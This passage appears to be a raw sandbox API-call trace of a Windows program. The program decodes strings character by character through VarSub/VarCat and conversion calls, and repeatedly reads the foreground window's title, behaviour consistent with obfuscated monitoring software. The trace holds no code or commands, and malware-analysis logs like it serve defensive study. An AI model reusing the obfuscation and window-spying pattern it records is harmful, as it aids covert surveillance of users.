out: pvarResult=0x28f180) returned 0x0 [0088.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0088.801] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0088.801] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0088.802] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.802] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.802] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0088.803] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0088.803] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0088.804] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0088.804] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.805] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.805] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0088.806] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0088.806] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0088.806] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0088.807] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.807] GetForegroundWindow () returned 0x10080 [0088.807] GetLastError () returned 0x0 [0088.807] SysStringLen (param_1=" ") returned 0xff [0088.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0088.808] SysStringLen (param_1=" ") returned 0xff [0088.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0xe577bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0088.808] GetWindowTextA (in: hWnd=0x10080, lpString=0xe577bc, nMaxCount=255 | out: lpString="") returned 0 [0088.808] GetLastError () returned 0x0 [0088.808] SysStringByteLen (bstr=" †††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0088.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0088.808] SysStringByteLen (bstr=" †††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0088.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=256, lpWideCharStr=0xe3bb3c, cchWideChar=511 | out: lpWideCharStr="") returned 256 [0088.809] SysStringLen (param_1="") returned 0x1 [0088.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=2, lpMultiByteStr=0xe570fc, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 2 [0088.809] SetWindowTextA (hWnd=0x2036e, lpString="") returned 1 [0088.809] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0088.809] GetFocus () returned 0x0 [0088.809] lstrlenA (lpString="") returned 0 [0088.809] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xc, wParam=0x0, lParam=0xe570fc) returned 0x1 [0088.809] IsWindow (hWnd=0x2036e) returned 1 [0088.809] IsWindow (hWnd=0x2036e) returned 1 [0088.810] IsWindow (hWnd=0x2036e) returned 1 [0088.810] IsWindow (hWnd=0x2036e) returned 1 [0088.810] GetFocus () returned 0x0 [0088.810] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0088.811] GetFocus () returned 0x0 [0088.811] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x1) returned 0x310bcd0 [0088.811] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xd, wParam=0x1, lParam=0x310bcd0) returned 0x0 [0088.811] GetFocus () returned 0x0 [0088.811] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bcd0 | out: hHeap=0x30f0000) returned 1 [0088.812] VarCmp (pvarLeft=0x28f180, pvarRight=0x28f1e8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0088.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N", lpUsedDefaultChar=0x0) returned 1 [0088.813] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0088.813] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[", lpUsedDefaultChar=0x0) returned 1 [0088.813] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0088.813] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`", lpUsedDefaultChar=0x0) returned 1 [0088.814] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0088.814] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N", lpUsedDefaultChar=0x0) returned 1 [0088.814] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0088.815] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c", lpUsedDefaultChar=0x0) returned 1 [0088.815] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0088.815] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0088.816] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0088.816] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0088.816] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0088.817] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0088.817] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0088.817] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0088.818] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0088.818] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0088.818] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0088.819] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0088.819] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0088.819] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0088.820] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0088.820] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0088.820] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0088.821] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.821] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.821] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0088.822] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0088.822] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0088.823] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0088.823] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.824] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.824] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0088.824] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0088.825] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0088.825] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0088.826] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.826] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.827] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0088.827] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0088.828] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0088.829] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0088.829] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.830] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.830] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0088.830] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0088.831] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0088.831] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0088.832] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.832] GetForegroundWindow () returned 0x102c2 [0088.832] GetLastError () returned 0x0 [0088.832] SysStringLen (param_1=" ") returned 0xff [0088.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 